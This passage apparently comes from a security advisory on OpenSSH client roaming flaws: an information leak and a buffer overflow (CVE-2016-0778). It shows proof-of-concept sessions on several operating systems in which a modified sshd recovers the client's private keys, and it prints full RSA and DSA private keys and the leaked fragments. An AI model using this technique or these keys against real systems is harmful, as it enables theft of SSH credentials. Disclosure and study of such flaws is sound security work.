MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme
Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key
$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013
$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:768" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-9448bb7f/infoleak
MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...
env ROAMING="client_out_buf_size:1024" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-279f5e2b/infoleak
... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...
Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013
$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:2048" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-35ee7ab0/infoleak
MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-6cb31d82/infoleak
... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=
Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----
"pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)
(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)
cat /tmp/roaming-a5eca355/infoleak
ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
Private Key Disclosure example: CentOS 7, 1024-bit DSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-b7b16dfc/infoleak
jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
strings /tmp/roaming-b324ce87/infoleak
IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v
strings /tmp/roaming-24011739/infoleak
KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
strings /tmp/roaming-37456846/infoleak
LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/
strings /tmp/roaming-988ff54c/infoleak
GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
strings /tmp/roaming-53887fa5/infoleak
/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4
Private Key Disclosure example: Fedora 20, 2048-bit RSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-a2bbc5f6/infoleak
cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
strings /tmp/roaming-47b46456/infoleak
RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9
strings /tmp/roaming-7a6717ae/infoleak
cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
strings /tmp/roaming-f3091f08/infoleak
lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
strings /tmp/roaming-62a9e9a3/infoleak
lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P
strings /tmp/roaming-8de31ed5/infoleak
7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
strings /tmp/roaming-f5e0fbcc/infoleak
yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
strings /tmp/roaming-9be933df/infoleak
QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
strings /tmp/roaming-ee4d1e6c/infoleak
SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
strings /tmp/roaming-c2bfd69c/infoleak
SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
strings /tmp/roaming-2b3217a1/infoleak
DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
strings /tmp/roaming-1e275747/infoleak
g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================
Analysis
Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:
239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }
-
packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
-
ssh_connect() opens new file descriptors, and connects them to the SSH server.
-
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
-
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.
The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:
-
In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
-
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
-
